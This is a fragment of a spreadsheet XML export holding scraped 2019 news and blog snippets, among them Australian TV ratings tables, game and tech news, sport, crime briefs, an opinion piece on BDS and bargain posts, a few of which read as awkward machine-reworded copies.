Breastfeeding Services Clinic: Public Health Breastfeeding Services is run by Public Health Nurses. This service offers one-to-one breastfeeding assessments, advice and referrals to community supports free of charge. Cosmetic Dentist In Kitchener Friendliest Dental Clinic In Kitchener Ontario Dave Thomas, founder of Wendy’s, loved the KewPee Burgers so much, he ...</t>
  </si>
  <si>
    <t>Leading strategy specialist Paradox has announced a new expansion of Hearts of Iron IV at its annual meeting, PDX Con. Her name is La Resistance, she has no release date yet and talks about espionage and local resistance movements. The spying has a new layer of play, the intelligence agency (Britain owns the SIS, for example). You can keep your information collection simple with just a few defensive spies, or invest more, improve your Intel branches or develop new ones. These could include a cryptology service, inspired by Alan Turing's work on the German puzzle code at Bletchley Park. If you decipher the codes of the enemy, you will have the choice of when to deploy an extremely powerful passive buff, but the enemy will notice and modify its codes after 30 days. You can also develop spy networks in hostile territory and some actions have been integrated into this system. State coups, for example, are now espionage operations and can be targeted more precisely, but also be defended – agents can be captured by the enemy and risk disclosing information under torture (but you can give them suicide pills to defend against this risk). With a focus on internal dissent rather than large domestic companies, Hearts of Iron IV is able to more accurately portray conflicts such as the Spanish Civil War and the differences between Nazi-occupied France. (Vichy) and free France. Spain has two of the biggest trees in the game to represent nationalists or Republicans in its civil war. This war is inevitable – it will / will / break – but it will be different each time you play according to your preparation. Each party can spend its political capital to claim certain territories or carry out strategic actions with major impacts on the coming conflict. The war also lasts a lot longer now, so you'll see foreign powers get involved. There are new alternative story trees – still a fan favorite – with the ability for you to play a descendant of Napoleon and avenge the British at the Battle of Waterloo. The fulfillment of wishes is cute. INFO Buy now</t>
  </si>
  <si>
    <t>Jason Di Rosso</t>
  </si>
  <si>
    <t>Australians David Michod and Joel Edgerton reimagine Shakespeare's Henry plays in a bloody, bruising film about power and violence that mostly works.</t>
  </si>
  <si>
    <t>Report: Daily Free-to-Air Share Channels: All Free-to-Air Channels Market: 5 City Metro (aggregate figure) Demographics: Total People Day-part: 18:00 – 24:00 Day: Tuesday Deliverable: Overnight, Consolidated 7 and Consolidated 28 Channel Overnight Consolidated 7 Consolidated 28 01/10/2019 24/09/2019 03/09/2019 ABC 12.8% 12.8% 13.8% ABC KIDS/COMEDY 2.1% 2.7% 2.6% ABC ME 0.6% 0.5% 0.6% ABC NEWS 1.7% 1.4% 1.4% ABC Network 17.2% 17.3% 18.4% Seven 17.8% 17.2% 15.5% 7TWO 3.2% 3.0% 2.7% 7mate 2.9% 2.8% 3.1% 7flix 1.6% 1.5% 2.2% 7food network 0.5% 0.5% 0.5% Seven Network 26.0% 25.1% 24.1% Nine 20.3% 19.5% 20.8% 9GO! 3.1% 3.4% 2.9% 9Gem 3.4% 2.9% 3.2% 9Life 2.1% 1.8% 2.4% Nine Network 28.9% 27.6% 29.3% 10 14.5% 16.6% 13.5% 10 Bold 4.1% 3.7% 3.7% 10 Peach 1.8% 2.1% 2.3% Network 10 20.4% 22.3% 19.5% SBS 4.7% 4.7% 5.1% SBS VICELAND 1.3% 1.3% 1.7% SBS Food 1.0% 1.0% 0.8% NITV 0.1% 0.2% 0.2% SBS World Movies 0.5% 0.4% 0.9% SBS Network 7.5% 7.6% 8.7% Report: Top 20 Programs Channels: All Free-to-Air Market: 5 City Metro (aggregate figure), Sydney, Melbourne, Brisbane, Adelaide &amp; Perth Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 01/10/2019 Deliverable: Overnight Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 THE MASKED SINGER AUSTRALIA TUES – REVEAL Network 10 1,004,000 292,000 315,000 200,000 103,000 94,000 2 SEVEN NEWS Seven Network 950,000 235,000 256,000 191,000 118,000 151,000 3 SEVEN NEWS / TODAY TONIGHT Seven Network 940,000 246,000 270,000 183,000 103,000 139,000 4 NINE NEWS 6:30 Nine 869,000 277,000 252,000 183,000 76,000 81,000 5 THE MASKED SINGER AUSTRALIA TUES Network 10 848,000 248,000 251,000 175,000 89,000 85,000 6 THE BLOCK -TUE Nine 820,000 270,000 250,000 146,000 67,000 87,000 7 NINE NEWS Nine 819,000 265,000 239,000 172,000 63,000 81,000 8 A CURRENT AFFAIR Nine 761,000 260,000 203,000 156,000 62,000 80,000 9 ABC NEWS-EV ABC 655,000 164,000 230,000 96,000 72,000 93,000 10 HOME AND AWAY Seven Network 645,000 185,000 178,000 147,000 55,000 80,000 11 HOW AUSTRALIA GOT ITS MOJO-EV ABC 578,000 140,000 218,000 78,000 50,000 92,000 12 7.30-EV ABC 567,000 124,000 203,000 90,000 68,000 83,000 13 THE REAL DIRTY DANCING – TUE Seven Network 532,000 150,000 164,000 98,000 45,000 76,000 14 THE CHASE AUSTRALIA Seven Network 522,000 134,000 136,000 122,000 67,000 63,000 15 THE PROJECT 7PM Network 10 510,000 135,000 169,000 114,000 41,000 50,000 16 HOT SEAT Nine 439,000 140,000 129,000 105,000 27,000 39,000 17 FOREIGN CORRESPONDENT-EV ABC 409,000 88,000 151,000 66,000 45,000 58,000 18 10 NEWS FIRST Network 10 328,000 79,000 80,000 88,000 36,000 44,000 19 THE CHASE AUSTRALIA-5PM Seven Network 325,000 85,000 83,000 82,000 40,000 36,000 20 SECRET BRIDESMAIDS’ BUSINESS – TUE Seven Network 320,000 84,000 98,000 62,000 31,000 45,000 Report: Top 20 Programs Channels: All free-to-air Multi Channels Market: 5 City Metro (aggregate figure), Sydney, Melbourne, Brisbane, Adelaide &amp; Perth Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 01/10/2019 Deliverable: Overnight Rank Description (grouped) Channel\Market (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 DEATH IN PARADISE -EV 9Gem 147,000 27,000 41,000 28,000 26,000 26,000 2 HIGHWAY PATROL-EP.2 PM 7mate 138,000 45,000 38,000 27,000 8,000 19,000 3 CSI: MIAMI 10 Bold 137,000 27,000 45,000 29,000 14,000 22,000 4 NCIS RPT 10 Bold 134,000 43,000 33,000 23,000 12,000 23,000 5 PEPPA PIG-AM ABCKIDS/COMEDY 131,000 15,000 32,000 39,000 11,000 34,000 6 BLUEY-EV ABCKIDS/COMEDY 125,000 32,000 33,000 29,000 18,000 13,000 7 CSI: MIAMI EP 2 10 Bold 125,000 20,000 47,000 25,000 12,000 21,000 8 JUPITER ASCENDING -EV 9GO! 114,000 26,000 39,000 27,000 9,000 14,000 9 PETER RABBIT-AM ABCKIDS/COMEDY 113,000 35,000 19,000 25,000 15,000 20,000 10 OLOBOB TOP-AM ABCKIDS/COMEDY 112,000 32,000 23,000 22,000 14,000 20,000 11 BANANAS IN PYJAMAS-AM ABCKIDS/COMEDY 112,000 18,000 39,000 29,000 13,000 14,000 12 PLAY SCHOOL-AM ABCKIDS/COMEDY 111,000 22,000 38,000 23,000 7,000 20,000 13 NEIGHBOURS 10 Peach 111,000 25,000 40,000 27,000 12,000 7,000 14 TOWIES-PM 7mate 110,000 43,000 26,000 21,000 8,000 11,000 15 POIROT -EV 9Gem 108,000 23,000 33,000 17,000 20,000 15,000 16 LITTLE PRINCESS-AM ABCKIDS/COMEDY 108,000 17,000 35,000 30,000 11,000 15,000 17 NELLA THE PRINCESS KNIGHT-PM ABCKIDS/COMEDY 107,000 24,000 23,000 29,000 16,000 15,000 18 FLOOGALS-EV ABCKIDS/COMEDY 106,000 28,000 20,000 25,000 18,000 16,000 19 DINO DANA-EV ABCKIDS/COMEDY 105,000 23,000 23,000 23,000 13,000 23,000 20 LUO BAO BEI-EV ABCKIDS/COMEDY 105,000 29,000 22,000 20,000 18,000 15,000 Free to Air: 25-54 demographics (Overnight) Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 THE MASKED SINGER AUSTRALIA TUES – REVEAL Network 10 531,000 154,000 176,000 95,000 55,000 52,000 2 THE MASKED SINGER AUSTRALIA TUES Network 10 437,000 125,000 138,000 80,000 44,000 50,000 3 THE BLOCK -TUE Nine 413,000 141,000 129,000 82,000 30,000 31,000 4 NINE NEWS 6:30 Nine 279,000 104,000 75,000 54,000 24,000 22,000 5 THE PROJECT 7PM Network 10 264,000 66,000 88,000 58,000 24,000 28,000 Free to Air: 18-49 demographics (Overnight) Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 THE MASKED SINGER AUSTRALIA TUES – REVEAL Network 10 485,000 147,000 163,000 86,000 49,000 41,000 2 THE MASKED SINGER AUSTRALIA TUES Network 10 401,000 119,000 130,000 71,000 40,000 42,000 3 THE BLOCK -TUE Nine 362,000 126,000 111,000 71,000 27,000 27,000 4 THE PROJECT 7PM Network 10 233,000 62,000 81,000 50,000 19,000 21,000 5 NINE NEWS 6:30 Nine 220,000 83,000 60,000 40,000 17,000 19,000 Free to Air: 16-39 demographics (Overnight) Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 THE MASKED SINGER AUSTRALIA TUES – REVEAL Network 10 298,000 92,000 101,000 55,000 30,000 20,000 2 THE MASKED SINGER AUSTRALIA TUES Network 10 252,000 76,000 86,000 43,000 27,000 20,000 3 THE BLOCK -TUE Nine 180,000 68,000 50,000 31,000 18,000 12,000 4 THE PROJECT 7PM Network 10 126,000 26,000 48,000 27,000 11,000 13,000 5 SEVEN NEWS / TODAY TONIGHT Seven Network 115,000 44,000 33,000 16,000 6,000 16,000 Report: Top 20 Programs Channels: All Subscription Channels Market: National STV Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 01/10/2019 Deliverable: Overnight Rank Description Channel\Market (r) National STV 1 THE BOLT REPORT Sky News Live 62,000 2 PAUL MURRAY LIVE Sky News Live 53,000 3 LIVE: THE BACK PAGE FOX SPORTS 505 47,000 4 JONES &amp; CREDLIN Sky News Live 44,000 5 CREDLIN Sky News Live 43,000 6 BLUE BLOODS TVH!TS 41,000 7 LIVE: NRL 360 FOX LEAGUE 38,000 8 ALONE A&amp;E 34,000 9 CRIMINAL MINDS TVH!TS 33,000 10 FAMILY GUY FOX8 32,000 11 DEBI MARSHALL INVESTIGATES FROZEN LIES crime + investigation 32,000 12 PML LATER Sky News Live 31,000 13 AMERICAN DAD! FOX8 29,000 14 PAWN STARS A&amp;E 28,000 15 BELOW DECK MEDITERRANEAN ARENA 27,000 16 CSI: CRIME SCENE INVESTIGATION TVH!TS 26,000 17 ESCAPE TO THE CONTINENT Lifestyle Channel 26,000 18 ESCAPE TO THE COUNTRY Lifestyle Channel 26,000 19 BORDER SECURITY: AUSTRALIA’S FRONT LINE FOX8 25,000 20 NCIS TVH!TS 24,000 © OzTAM Pty Limited 2019. The Data may not be reproduced, published or communicated (electronically or in hard copy) without the prior written consent of OzTAM. Program performance and ranking information subject to change when not based on final program logs. Ranking information is for individual episodes. Includes Preliminary data.</t>
  </si>
  <si>
    <t>Nineteen-year-old Hayden Currie faced the Melbourne Magistrates’ Court on Wednesday night charged with two counts of culpable driving and one count of negligently causing serious injury.</t>
  </si>
  <si>
    <t>Alberta Theatre Projects' "Disgraced" hit the Martha Cohen Theatre in Calgary on Wednesday.</t>
  </si>
  <si>
    <t>Anti-abortion campaigners have begun 40 days of continuous prayer outside South Australia’s largest abortion clinic as pressure mounts to have them moved 150m away through draft laws currently before parliament.</t>
  </si>
  <si>
    <t>An Angus historian has taken a trip down memory lane to produce a second book exploring Forfar in years gone by.</t>
  </si>
  <si>
    <t>GOOGLE’S popular Mini smart speaker is back with a new name, improved sound and a more eco-friendly design. Here’s all you need to know about this new device. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>(CNN) — Archaeologists in Egypt have discovered a long-lost 2,200-year-old temple thought to belong to Pharaoh Ptolemy IV. The ancient tomb structure was accidentally found by construction workers during drilling on a sewage drain in the village of Kom Shakau in the Tama township in northern Sohag, according to a Facebook post made on September 29 by Egypt’s Ministry of Antiquities. A photo released by Egypt’s Ministry of Antiquities shows the newly discovered tomb. Egyptian Ministry of Antiquities Drilling work was suspended following the discovery. Archaeologists quickly found stone inscriptions with fragments of text featuring the name of Ptolemy IV, the fourth pharaoh of Egypt’s Ptolemaic dynasty. The team has so far uncovered a north-south wall, an east-west wall and the southwestern corner of the limestone structure, which is engraved with carvings of Hapi, the Egyptian god of the annual flooding of the Nile, carrying offerings while surrounded by birds and flowers. Sarcophagi inside a recetly discovered burial shaft at the Giza pyramid plateau in Cairo. MAHMOUD KHALED/AFP/AFP/Getty Images Experts are working to save what remains of the temple, which sits on the Nile’s western bank. Ptolemy IV is believed to have ruled Egypt from around 221 BC to 204 BC. His rule was not a successful one and he was more interested in frolicking and pursuing artistic endeavors than kingship. Ancient texts indicate that the Pharaoh is said to have built the largest human-powered ship ever made. Called the tessarakonteres (“Forty”), the galley had 40 banks of oars, operated by 4,000 oarsmen. The ancient temple’s discovery is the latest in a series of archaeological discoveries in 2019. Egypt is hoping to increase interest in tourism following the country’s uprising in 2011. A picture shows the inside of the tomb of ancient Egyptian nobleman “Khewi” at the Saqqara necropolis, about 35 kilometres south of Cairo. MOHAMED EL-SHAHED/AFP/Getty Images August 2018 saw the UN’s Tourism Highlights Report feature Egypt as the fastest growing tourist destination in 2017, with a 55.1% growth in international arrivals that year. Important findings include eight mummies from the Ptolemaic Dynasty (323-30 BC) encased in brightly painted coffins at the Dahshur necropolis near Giza, a stone sphinx at Kom Ombo, a riverside temple near Aswan dedicated to the crocodile god Sobek and the discovery of a 4,400-year-old tomb at the Saqqara archaeological site. These ancient treasures accompany Egypt’s current museum construction boom, with new collections scheduled to open soon in the towns of Sharm el-Sheikh and Hurghada. The long-awaited Grand Egyptian Museum is also nearing completion. The world’s largest museum dedicated to a single civilization is preparing for a grand opening in mid-2020. 2,200-year-old Egyptian temple discovered The post 2,200-year-old Egyptian temple discovered appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>FACEBOOK: ► http://www.facebook.com/JayFmusicRap ◄ MUHIM: ► http://twitter.com/JayFmusicRap ◄ INSTAGRAM: ► http://instagram.com/jayfmusicrap ◄ SPOTIFY: ► https://open.spotify.com/artist/3kpZ5iLHQBzm1ro5caltwq ◄ ▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂ BU Rassomlarda Kanallarga […] The post BEPUL YONG'INNING RAP 「Oxirgi guruhi」 」RASMIY VİDEO KLIP JAY-F FT BTH O'YINLARI, JONLI NERO va S. TÁRRAGA appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Dubai Parks and Resorts is the Middle East’s largest integrated leisure and theme park destination located on Sheikh Zayed road in Dubai, United Arab Emirates. The post dubai park…lapita resort appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>An increase in sexually transmitted diseases the highest numbers reported in decades has been linked to the prevalence of online dating.</t>
  </si>
  <si>
    <t>Oct. 11, 2019 BDS Was Started by Western NGOs and European Governments, Not the Palestinians – Gerald Steinberg When Omar Barghouti was recently barred from entering the UK, many media reports referred to him as founder of the Israel boycott movement BDS. This is factually incorrect: he was added for marketing purposes four years after the BDS launch. In reality, the BDS movement was officially launched in 2001 at the NGO Forum of the anti-Semitic UN World Conference on the Elimination of Racism, held in Durban, South Africa. The instigators were a group of radical NGOs that demanded “the complete international isolation of Israel as an apartheid state.” A few months later, the first boycotts began when Trotskyite cells in the British academic union manipulated votes to get support for boycotts of Israeli universities. In parallel, anti-Israel activists in the U.S. organized rallies outside board meetings to demand an end to Israeli sales by corporations like Caterpillar. As these activities increased, a movement ostensibly on behalf of the Palestinian cause led by Westerners became visibly and politically awkward. To give BDS a more authentic facade, the Palestinian Campaign for the Academic and Cultural Boycott of Israel (PACBI) was launched through a letter signed by a group of Palestinian intellectuals. In the years that followed, BDS activists sought to market their campaign as a response to the Palestinian boycott call, although this was false. BDS was and remains largely a Western anti-Semitic movement led by NGOs and financed by European governments. The writer is a professor of political studies at Bar-Ilan University and founder-president of NGO Monitor. (Jewish Chronicle-UK)</t>
  </si>
  <si>
    <t>Travel to Japan October 01, 2019 The post Travel to Japan October 01, 2019 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>MONTREAL — If you follow any of the Montreal Alouettes players on Instagram, you know exactly what Club 514 is. You’ve seen the videos in their IG stories. William Stanback break dancing. Henoc Muamba laughing in the background while hyping up his teammates. Jeremiah Johnson showing everyone up with his dancing skills. The bright lights in the locker room turn off and strobe lights come on. The smoke machine gets cranked and the music is bumping. There are glow sticks, everywhere. There’s also a VIP section. And on Thursday they even had someone on a mic. They’ve dubbed the dance party Club 514. Every walkthrough day, after the team’s meetings are finished, everyone flocks to the dressing room to have some fun. The mastermind behind the entire thing is kicker Boris Bede, according to Muamba. Team meetings start with special teams and then things break off to offence and defence, leaving the special teamers with some time on their hands. “Every team I’ve ever been a part of, the special teams guys, the punters specifically, they always have extra time,” Muamba said. “There’s an hour and a half where special teams guys have so much time,” Muamba continued. “They have so much time to think about doing something crazy. I’ve been on other teams where punters try and pull pranks on other guys. ” Every week there is a theme for the music. It was country night two weeks ago when the Alouettes hosted the Stampeders. This week was one hit wonders. “We look forward to it,” smiled Muamba. “As a defence, when we finish (our meetings) we run into the locker room like, ‘what’s it going to look like today? What’s the theme today?’ And they usually have a theme as far as what kinds of songs they’re going to play.” Along with Club 514, the Alouettes also have hat day on walkthrough day. Spotted on Thursday was a taco hat, a pink flamingo hat and a football, just to name a few. “We’ve just got a bunch of silly hats,” said the Als middle linebacker. “Guys just keep bringing in sillier and sillier hats. It’s getting pretty ridiculous. But we love it. “Today’s our loose, fun day. We still want to be focused but just be relaxed and focus on the things we need to focus on.”</t>
  </si>
  <si>
    <t>A Gold Coast millionaire found guilty of killing his estranged wife as their two children slept is appealing his conviction and sentence.</t>
  </si>
  <si>
    <t>Alan Shearer has claimed that Sean Longstaff is back to his best after the Newcastle United midfielder impressed in the 1-0 win against Manchester United at St James’ Park on Sunday. Matty Longstaff, Sean’s younger brother, grabbed all the headlines with a match-winning goal on his Premier League debut but the eldest of the midfield pair definitely deserves all the plaudits that have... Source</t>
  </si>
  <si>
    <t>By Stephany Nunneley, Tuesday 1st October 2019 at 20:10 GMT Call of Duty: Mobile is now available in all countries and regions where Google Play and App Store are supported. With the exception of Mainland China, Vietnam and Belgium, Call of Duty: Mobile is now available for Android and iOS. Developed by TiMi Studios of Tencent Games, the title released by Activision brings the Call of Duty experience to mobile. The free game features various racing modes, familiar characters and various weapons from the franchise, including the Modern Warfare and Black Ops universes. As we have already said, it also offers a Battle Royale experience, including several Call of Duty sites offering land, sea and air vehicles. Following today's launch, additional free content for Call of Duty: Mobile will be released via new seasonal updates, game modes, equipment and personalization items. The first global community event entitled "Lighting up the World" is live now. As you play, you will unlock rewards for all players for free, including new cams for a variety of items in the game. Players can check the overall progress towards unlocking in the Events section of the app . Go to the App Store or Google Play and try your luck. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>Real Madrid forward Gareth Bale has made a transfer decision about his future at the Santiago Bernabeu, after his latest Champions League shun, and he’s put Manchester United on alert. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>Melbourne Racing Club’s ticket into The Everest will pass down to the second place getter if Oakleigh Plate winner Booker wins Saturday’s Schillaci Stakes.</t>
  </si>
  <si>
    <t>A cargo plane carrying presidential staff has crashed in the Democratic Republic of Congo and all eight passengers and crew are feared dead.</t>
  </si>
  <si>
    <t>LootiusMaximus</t>
  </si>
  <si>
    <t>Back again with another deal just for OzBargainers! Make sure you use the code for another 5% off :) We also have some great deals going on with our post PAX sale so, feel free to combine to save on postage! Board Game Geek: 7.3 Game Description: Planet of the Apes puts 1-4 players on a crash course with feral foes, deadly environments, and unbridled psychological horror! In an innovative twist on the cooperative board game genre, each player takes control of one aspect of Colonel George Taylor's psyche, and must work together to survive the Planet of the Apes! Starting with the classic film, Planet of the Apes follows the plot of the original movie and promises players a thrilling adventure in an unknown land! Designed by Richard Launius, the creator of Arkham Horror, perfect for players who love games, or just want a new way to enjoy the films. Planned as the first in a series of games based on the classic series of films.</t>
  </si>
  <si>
    <t>International rugby's entertainers bottled their World Cup campaign but potential games against Test giants are a sign of progress.</t>
  </si>
  <si>
    <t>Peter Quinlan</t>
  </si>
  <si>
    <t>Pockets of showers and mountain flurries continue in the Okanagan weather forecast for the third weekend of October.</t>
  </si>
  <si>
    <t>Conservative Home</t>
  </si>
  <si>
    <t>WATCH IN FULL Prime Minister @BorisJohnson and European Commission President @JunckerEU hold a new conference urging MPs to 'deliver #Brexit without any more delay'. Read the highlights and get the reaction from MPs on the #BrexitDeal here: https://t.co/1JgTUGZlJ1 pic.twitter.com/H1ntwuiUFg — Sky News (@SkyNews) October 17, 2019</t>
  </si>
  <si>
    <t>Donald Trump calls House intelligence committee chairman Adam Schiff a "fraud" and a "low-life" as Democrats warn that any effort to interfere with the impeachment investigations would be considered evidence of obstruction.</t>
  </si>
  <si>
    <t>WWE Hell in a Cell 2019 could feature the return of Ronda Rousey as one of many huge surprises on the pay-per-view. Source: Sports Business News</t>
  </si>
  <si>
    <t>Last year when his pilot aired on 10, Kyle Sandilands made plenty of derisive comments about Trial By Kyle and expressed no interest in the show proceeding to series. Normally that’s the kind of attitude that cops a spray from network execs or gets your show cancelled. But Kyle Sandilands is hired for his no-filter personality and controversial comments generate their own publicity. Fast-forward to 12 months later and he’s had a change of heart. Stop press. Kyle has come to like his own show. “I didn’t want to do this show in the first place. It’s a pain in the arse filming all day Saturday and Sunday and then working 5 days a week,” he tells TV Tonight. “I never wanted to do it. It wasn’t my idea and my company doesn’t own it, so what the f*** am I doing it for? To make some other company shitloads of money?” The Screentime series, which bears a striking resemblance to Judge Judy, sees the radio host mediate civil cases in a faux courtroom set. When it screened as part of 10’s 2018 Pilot Week it divided viewers, which is par for the course for the seasoned shock jock. “I wasn’t thrilled with the pilot because they squeezed too many cases into it” “I wasn’t thrilled with the pilot because they squeezed too many cases into it and they do what TV does all the time: edit for time rather than for content. When there were 4 cases in the pilot it was far better but they squeezed an extra 2 in there. I thought ‘Typical TV, you’ve gone and f***ed it up!’” he explains. “I would sometimes film a case for an hour, because we were rushing the pilot too much. And there were too many ‘TV losers’ on. Little tryhards from other shows. So I said ‘Let’s forget about that rubbish. Let’s do more real cases that are serious.’ Even though they still feel quite petty like Judge Judy. “If someone was on there just to get noticed I would stop filming it” “If someone was on there just to get noticed I would stop filming it and say ‘Let’s f*** these people off.’ They’re not here for the right reason.” Participants have signed a contract agreeing to abide by Sandilands’ verdict. In the US producers of Judge Judy also pay the costs of civil cases. It can be a cheap monetary way out of a lawsuit for the humiliation of a dressing down on TV. “I’m not privy to the exact deal but it’s a similar situation to that. They’re more likely to be lured onto TV and look like a bit of a dope,” he continues. “But you never know how it’s going to go. I think a lot of people come to the court thinking they know what I will or will not do.” So what made him agree to a season of episodes? “Just gigantic amounts of money. That’s the honest truth,” he admits. “My heart wasn’t to be judgmental judge on TV, wasting many weekends putting it together. But once we got rid of the Santa Claus suit and put a real seat in, and a few other adjustments, it’s much better. “I wanted real cases, no actors, none of that bullshit these shows do” “I said ‘Let’s get rid of the hokey stuff.’ If I can see that it’s phony and rubbish, so can anyone watching. I wanted real cases, no actors, none of that bullshit these shows do. ‘If we can’t treat it real, I’m not doing it.’ “So they agreed to all my terms and then halfway through the first day of filming I felt like I belonged on the judging bench my whole life. Because I’m quite judgmental in real life! “I wasn’t about making jokes and trying to take the piss. There’s a bit of that but I wanted to get to the bottom of the truth. “Usually I’m looking for the cheap laugh. Which I still do by default, but I really wanted to make sure I got a full understanding of what each case is about -even if it was dumb.” “I hope what we’ve done people like. I even like it, and I started off hating it.” As for his interest in how his show rates, he is again non-plussed. “Someone will bring it to my attention. I hope it does well in the demos for Channel 10’s sake. But I don’t know what it’s up against. I hope what we’ve done people like. I even like it, and I started off hating it.” I advise he is against Love Island, which he doesn’t consider much of a threat. “I love Sophie and I like Love Island, but even I turned it off halfway last night.” Sandilands, who together with Jackie O, has reportedly signed a $50m radio deal over six years, also says the big bucks are not earned in TV but radio. And he’s not busting to do TV. “I earned a million dollars to do 3 months work on Australian Idol. So of course I loved it. But I was earning $4m a year from radio. When you are successful on radio you are leaps and bounds ahead of the highest paid person on TV. You’d think you would get more on TV because it’s more glamorous. But it’s a shit-paying job compared to radio if you’re doing well. So why bother wasting my life filming rubbish TV that does nothing for me or that I‘m not passionate about?” he asks. “If they wanted to do another one I would probably say yes.” “So I wasn’t passionate about this until I got into it. If they wanted to do another one I would probably say yes. A year ago I was bitching and complaining, but after I made some adjustments I was really happy with it.” Sandilands has also produced Meet the Hockers for 9GO! and is developing an extreme property series, potentially for 10. But he remains selective about further TV pursuits. “I’ve had a couple of development deals offered from the big production companies. But to align to one production company for a development deal has to be worth a substantial amount of money for me to put all my eggs in one basket. So there’s a couple on the desk for me to look through. “People want me to do it, I just don’t know if I give a shit enough.” “People want me to do it, I just don’t know if I give a shit enough. I only want to do things I’m really passionate about. “I’d like to do a variety show, but that doesn’t seem to float in this country for some reason. And I’ve talked to Channel 10 about a Friday night weekly show. But then I’d have to be in Australia every Friday night and I live half the year in America. “I’ve always liked the Letterman sort of shows, but Rove’s given it a crack here and even he can’t make it work. “But I’ll open my arse up for any of the networks, I’m not just all about 10.” Trial By Kyle 8:40pm Thursday on 10.</t>
  </si>
  <si>
    <t>Mila is having far fewer - and briefer - seizures after a drug was designed just for her. The post Batten disease girl given custom-made drug appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Boris Johnson has vowed to raise US diplomat's wife Anne Sacoolas immunity personally with the White House. The post Harry Dunn: PM Boris Johnson to “raise case personally” with White House appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>A forrmer NSW education minister argues for a better way to assess HSC candidates competing for a place at university.</t>
  </si>
  <si>
    <t>James Delingpole</t>
  </si>
  <si>
    <t>I’ve nearly finished my latest screenplay, Drift. It’s a reimagining of a British imperial atrocity which took place in Natal…</t>
  </si>
  <si>
    <t>BOOK YOUR TRIP TO COLOMBIA NOW Homepage ► Follow me on Instagram ► Follow me on Facebook ► Welcome to Colombia Cartagena Colombia ( also known as “La Heroica”, was founded on June 1, 1533 and declared a Historical and Cultural Heritage of Humanity by UNESCO in 1984 ( Currently, Cartagena is a Colombian tourist […] The post Everything I know about Tourism in Cartagena – Colombian Travel Guide appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>President Assad’s forces move towards border towns after reaching a deal with Kurdish forces. The post Turkey-Syria offensive: Syrian army heads north after Kurdish deal appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Oil prices fell on Tuesday, after heavy losses in the previous session, as two days of weak Chinese data added to worries about the top crude oil importer's energy demand growth.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/191002/p37#a191002p37 Atom Finance, investment research platform targeting high-end individual investors, raises $10.6M Series A led by General Catalyst (Sara Fischer/Axios) Sara Fischer / Axios: Atom Finance, investment research platform targeting high-end individual investors, raises $10.6M Series A led by General Catalyst — Atom Finance, a new media and financial technology company, has raised $10.6 million in a Series A round, executives tell Axios. Source: http://www.techmeme.com/191002/p37#a191002p37 The post Atom Finance, investment research platform targeting high-end individual investors, raises $10.6M Series A led by General Catalyst (Sara Fischer/Axios) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>* Why do I ache for Kurdistan? Say, why should this English Scot care? Why stir my heart, my atheist soul? It’s miles to here from out there Why does my hard and rational mind agree with my heart this is right? Why can humanity seek and find new hope through this brave Kurdish fight? […]</t>
  </si>
  <si>
    <t>Prince George celebrates Aston Villa’s 5-1 win with William, Kate and sister Charlotte | Royal | News Original Source A gap-toothed George, six, was seen grinning and laughing with the Duchess of Cambridge and Prince William as the duke’s team beat Norwich City at their Carrow Road stadium today, amounting speculation the little boy is also a keen Villa fan. Although there was no sign of one-year-old Prince Louis, Princess Charlotte, four, looked on thoughtfully as fans cheered the team on toward a victory. George was sporting an Aston Villa t-shirt as he beamed when the team scored goal after goal. One image shows the youngster punching the air as he celebrates with his mother. The adorable display was seen by Gary Lineker. The TV presenter tweeted: “Think Prince George has caught the football bug early.” The official Aston Villa twitter account also sent George warm wishes, and tweeted: “You know how to pick your #AVFC games, Your Royal Highness.” They added a winking emoji to the sweet message. William sported a royal blue v-neck jumper and matching shirt while the Duchess of Cambridge wore a brown jacket with her long hair down. The pictures come after William was spotted going wild in May when his club secured promotion to the Premier League through a Championship play-off final. William has always worn his heart on his sleeve when it comes to his club allegiance and the Villa fan was watching on at Wembley in one of the upper boxes. READ NOW: Kate Middleton makes surprising revelation about Princess Charlotte Prince William has supported Villa since his school days and revealed his strange geographical choice to Gary Lineker during a BBC interview at the 2015 FA Cup final. He explained: “I was looking around for clubs. “All my friends at school were either Man United fans or Chelsea fans and I didn’t want to follow the run of the mill teams. “I wanted to have a team that was more mid-table that could give me more emotional rollercoaster moments. Aston Villa’s always had a great history. “I have got friends of mine who support Aston Villa and one of the first FA Cup games I went to was Bolton v Aston Villa back in 2000. “Sadly, Villa went on to lose to Chelsea. It was fantastic, I sat with all the fans with my red beanie on, and I was sat with all the Brummie fans and had a great time. “It was the atmosphere, the camaraderie and I really felt that there was something I could connect with.”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Prince George celebrates Aston Villa’s 5-1 win with William, Kate and sister Charlotte | Royal | News appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>delirium211</t>
  </si>
  <si>
    <t>Amazon Australia has price matched the JB Hifi Offer. Comes down to 964.03$ if you include the 3.5% Cashrewards Cashback. JBHifi is cheaper with a 5% coupon but this would be the next best deal after the coupon expires. Cheers.</t>
  </si>
  <si>
